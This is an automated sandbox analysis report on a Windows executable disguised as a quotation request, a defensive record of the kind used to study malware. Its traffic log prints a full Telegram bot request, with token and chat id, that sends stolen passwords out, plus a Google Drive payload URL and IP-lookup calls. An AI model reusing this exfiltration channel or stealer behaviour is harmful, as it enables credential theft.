            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd17f9c670142fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035547000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003542D000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035547000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003542D000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035547000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003521F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003542D000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000351C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/e
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: Request for Quotation New collaboration.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000351C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035547000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003542D000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/0
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C57000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2814520651.00000000066D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2175621222.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2175621222.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_&export=download
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_&export=downloadaS
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2175621222.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_&export=downloadgo
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2175621222.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_&export=downloadl
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Request for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49732 version: TLS 1.2
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Request for Quotation New collaboration.exe
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_0040335A
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_00404B100_2_00404B10
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_0040653F0_2_0040653F
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_00404B105_2_00404B10
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_0040653F5_2_0040653F
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_001543285_2_00154328
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_0015E6A85_2_0015E6A8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_00158DA05_2_00158DA0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_001559685_2_00155968
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_00155F905_2_00155F90
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_0015E6985_2_0015E698
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_00152DD15_2_00152DD1
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A5B285_2_351A5B28
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AA9285_2_351AA928
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AAF805_2_351AAF80
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A16085_2_351A1608
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AA9195_2_351AA919
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A59085_2_351A5908
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AEB3B5_2_351AEB3B
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AD3305_2_351AD330
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AD3215_2_351AD321
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AEB485_2_351AEB48
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351ABD785_2_351ABD78
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AD7785_2_351AD778
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A93705_2_351A9370
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351ABD685_2_351ABD68
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A93615_2_351A9361
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AEF905_2_351AEF90
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AD7885_2_351AD788
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A51805_2_351A5180
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A97B95_2_351A97B9
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AEFA05_2_351AEFA0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AC1D05_2_351AC1D0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A97C85_2_351A97C8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AC1C05_2_351AC1C0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A15FB5_2_351A15FB
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AF3F85_2_351AF3F8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AF3EB5_2_351AF3EB
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AC6185_2_351AC618
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A8A135_2_351A8A13
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A9C115_2_351A9C11
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AE60B5_2_351AE60B
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AC6285_2_351AC628
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A9C205_2_351A9C20
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AF8505_2_351AF850
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AF8435_2_351AF843
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AA0785_2_351AA078
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351ACA705_2_351ACA70
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AA0685_2_351AA068
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351ACA805_2_351ACA80
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351ACED85_2_351ACED8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AA4D05_2_351AA4D0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351ACEC85_2_351ACEC8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AA4C05_2_351AA4C0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351A60FE5_2_351A60FE
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AE6F05_2_351AE6F0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE77F05_2_37EE77F0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE95685_2_37EE9568
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE84905_2_37EE8490
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE42A05_2_37EE42A0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE71A85_2_37EE71A8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE61305_2_37EE6130
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE7E405_2_37EE7E40
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE98D05_2_37EE98D0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE77E05_2_37EE77E0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE46EE5_2_37EE46EE
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE46F85_2_37EE46F8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE56315_2_37EE5631
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE15E85_2_37EE15E8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE15F85_2_37EE15F8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE35885_2_37EE3588
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE35985_2_37EE3598
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE04885_2_37EE0488
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE84815_2_37EE8481
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE04985_2_37EE0498
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE23005_2_37EE2300
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE22F35_2_37EE22F3
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE42995_2_37EE4299
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE11A05_2_37EE11A0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE11905_2_37EE1190
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE31405_2_37EE3140
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE61215_2_37EE6121
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE31305_2_37EE3130
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE00405_2_37EE0040
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EEE0205_2_37EEE020
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EEE0305_2_37EEE030
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE001F5_2_37EE001F
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE4FA85_2_37EE4FA8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE4F995_2_37EE4F99
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE1EA85_2_37EE1EA8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE1E985_2_37EE1E98
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE3E485_2_37EE3E48
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE3E385_2_37EE3E38
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE7E305_2_37EE7E30
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE0D485_2_37EE0D48
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE0D385_2_37EE0D38
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE2CE85_2_37EE2CE8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE2CD85_2_37EE2CD8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE4B405_2_37EE4B40
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE4B505_2_37EE4B50
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE8ACA5_2_37EE8ACA
